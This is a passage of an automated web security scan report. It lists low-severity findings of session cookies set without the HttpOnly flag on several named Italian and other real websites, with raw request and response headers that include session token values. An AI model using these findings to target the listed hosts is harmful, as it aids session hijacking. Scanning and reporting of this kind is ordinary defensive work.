User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:30 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21618/serv3.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21618/serv3.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:31 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.7. http://attiva.ilsole24ore.com/pr_home.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://attiva.ilsole24ore.com
Path:   /pr_home.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pr_home.jsp HTTP/1.1
Host: attiva.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:34 GMT
Server: Apache/2.0.63 (Unix) mod_jk/1.2.26
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=1BA822532BA5DF3E077B74D8659CF3A1.worker2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 15704


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Il Sole 24 ORE.com - Registrazione account Pro</title>
<meta htt
...[SNIP]...

15.8. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://compraonline.mediaworld.it
Path:   /webapp/wcs/stores/servlet/PartnerVisit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/PartnerVisit HTTP/1.1
Host: compraonline.mediaworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=WJQRQWS10.150.100.106CKOMO; path=/
Date: Mon, 02 May 2011 22:23:40 GMT
Server: IBM_HTTP_Server
Set-Cookie: WC_SESSION_ESTABLISHED=true;Path=/
Set-Cookie: WC_ACTIVESTOREDATA=%2d1%2c0;Path=/
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2cnull%2cnull%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b0%7cnull%7cnull%7cnull%7c%2d2000%5d%2cFxzPeDXIPd7cX6bMF%2bALqLJIS1E%3d;Path=/
Set-Cookie: JSESSIONID=00008nL4Fpb75tvkGm_qBD0kBDp:15hmqbnap;Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Length: 2299
Vary: Accept-Encoding
P3P: CP='NOI DSP COR OPTa BUS OTC'
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
/
...[SNIP]...

15.9. http://cp.mightyblue.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:18 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&Username=&Password=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=KGAIJAJDPDPMGCEMADNKOION; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.10. http://cp.mightyblue.com/forgotPassword.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /forgotPassword.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=JDAKGJPDBNFFGPKGHBLCENLI; path=/
ACCEPT-RANGES: none


<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /
...[SNIP]...

15.11. http://cp.mightyblue.com/forgotPassword.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /forgotPassword.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=ELBIJAJDLCPFIJBGMHMCMHEA; path=/
ACCEPT-RANGES: none


<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /
...[SNIP]...

15.12. https://eprocurement.eni.it/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://eprocurement.eni.it
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: eprocurement.eni.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 20899
Content-Type: text/html
Set-Cookie: view=id=%2C2%2C; path=/
Set-Cookie: option=i%5Fid%5Flang=2; expires=Tue, 01-May-2012 22:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBDSQRQ=DJHFOBHDKCGMFLBFLDPOIJJP; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-e
...[SNIP]...

15.13. http://expertsystem.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://expertsystem.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26280
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCACDTTDR=JFEIGGPCPJLGOBDOHIGKMLDP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...

15.14. http://factbook.eni.com/en  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://factbook.eni.com
Path:   /en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSd1d65348132f298e3a33d432aa778c49=nu29fif9eoum1fvcq35p6ali61; expires=Thu, 26-May-2011 01:57:44 GMT; path=/; domain=.factbook.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:24:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

15.15. http://factbook.eni.com/en/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://factbook.eni.com
Path:   /en/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/home HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSd1d65348132f298e3a33d432aa778c49=irqcmvk5nhdv2e8ov35rcstsa7; expires=Thu, 26-May-2011 01:57:45 GMT; path=/; domain=.factbook.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

15.16. http://finanza-mercati.ilsole24ore.com/fcxp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /fcxp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fcxp HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8545EE5D514A53D1CEEEEA872B52D519; Path=/
Set-Cookie: JSESSIONID=254F862C155FA99E89A3249DA6026A7B; Path=/
Set-Cookie: PremiumCookie=false
Set-Cookie: PremiumCookie=false
Content-Length: 153
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

<!--
DUMMY PAGE
QUI SI E' VERIFICATO UN ERRORE:
"La risorsa richiesta non e' attualmente disponibile sul server. Per favore controllare"
DUMMY PAGE
-->


15.17. http://mightyblue.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mightyblue.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mightyblue.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37743
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQASDSRC=EMENEEBDJOOMEPPBDBBOJNOH; path=/
Cache-control: private
ACCEPT-RANGES: none

<html>
<head>
<title>MightyBlue.com Hosting Services</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META name="description" content="MightyBlue Web and Email hos
...[SNIP]...

15.18. http://multicard.eni.com/it_en  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://multicard.eni.com
Path:   /it_en

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it_en HTTP/1.1
Host: multicard.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_fastcgi/2.4.6 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: SESSf61565ecd016d8348c3898324bff0b39=gvo853ai5nqmadfdkb260sanv7; expires=Thu, 26-May-2011 01:59:45 GMT; path=/; domain=.multicard.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:26:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: ip2locale_lc=it_en; expires=Wed, 01-Jun-2011 22:26:25 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it_en" lang="it_en" dir="ltr">
<hea
...[SNIP]...

15.19. http://paginebianche.ilsole24ore.com/execute.cgi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://paginebianche.ilsole24ore.com
Path:   /execute.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:34 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375194561290; path=/; expires=Thu, 29-Apr-21 22:26:34 GMT; domain=.ilsole24ore.com
Set-Cookie: PHPSESSID=1ffh2sghlilotqrq20u2nst8a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=1ffh2sghlilotqrq20u2nst8a1; domain=.paginebianche.it
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="it">
<head><meta http-equiv="Content-Type" content=
...[SNIP]...

15.20. http://paginegialle.ilsole24ore.com/pgolfe/action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://paginegialle.ilsole24ore.com
Path:   /pgolfe/action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pgolfe/action HTTP/1.1
Host: paginegialle.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 12417
Connection: close
Set-Cookie: kpi=195.27.58.40.49021304375198356; path=/; expires=Thu, 29-Apr-21 22:26:38 GMT; domain=.paginegialle.it
Set-Cookie: sessionid=7101682110525820065; Path=/
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.21. http://rainbow.mythings.com/pix.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rainbow.mythings.com
Path:   /pix.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1
Host: rainbow.mythings.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:16:02 GMT
Expires: -1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/
Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
X-AspNet-Version: 4.0.30319
x-machine-name: Rainbow-28 (i-00667d77)
X-Powered-By: ASP.NET
Content-Length: 3147
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>

<script type="text/javascr
...[SNIP]...

15.22. http://searchcio-midmarket.techtarget.com/definition/expert-system  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://searchcio-midmarket.techtarget.com
Path:   /definition/expert-system

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /definition/expert-system HTTP/1.1
Host: searchcio-midmarket.techtarget.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:29:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=57A0F5F504CF1CC8C3E5AC2F73CA1B4A; Path=/
Cache-Control: max-age=600
Expires: Mon, 02 May 2011 21:39:33 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 53314

<!DOCTYPE html>
<html>
<head>
<meta name="pageStart" content="1304371780790" />


<!-- TTBC-TMP-Head, searchcio-midmarket.techtarget.
...[SNIP]...

15.23. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://searchcio.techtarget.com
Path:   /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry HTTP/1.1
Host: searchcio.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:10 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8A0EC464EE7664CEA88D868EA802EB5D; Path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 73912

<!DOCTYPE html>    
<html>
<head>
<script>
var appCode=55;
</script>
<meta name="pageStart" content="1304375230675" />


<!-- TMP
...[SNIP]...

15.24. https://secure.mightyblue.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:34 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=EEAKGJPDHNEFBMHOCDHJNHLA; path=/
Cache-control: no-cache

